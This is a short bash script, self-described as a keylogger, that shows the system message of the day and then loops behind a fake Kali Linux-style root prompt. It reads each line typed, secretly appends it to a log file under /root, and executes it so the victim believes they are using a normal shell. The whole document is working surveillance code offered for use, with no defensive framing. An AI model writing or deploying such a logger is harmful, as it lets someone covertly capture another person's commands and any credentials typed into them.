#!/bin/bash # This script will run a keylogger # and display a fake terminal prompt Log=/root/keylogger/log.txt # Clear the terminal clear # Show the motd cat /etc/motd # Loop forever while true do # Get current terminal prompt promptp11="┌──(" #blue promptp12=$(whoami) #red promptp13="㉿kali" #red promptp14=")-[" #blue promptp15=$(pwd) #green # Replace home directory with ~ promptp15=${promptp15//"$HOME"/"~"} promptp16="]" #blue promptp21="└─" #blue promptp22="#" #red # Display the prompt formatted for the user printf "\e[1;34m$promptp11\e[1;31m$promptp12\e[1;31m$promptp13\e[1;34m$promptp14\e[1;32m$promptp15\e[1;34m$promptp16\n\e[1;34m$promptp21\e[1;31m$promptp22\e[0m " # Read user input read input if [ -z "$input" ]; then exit fi # save the input to a file echo $input >> $Log # Run the command $input done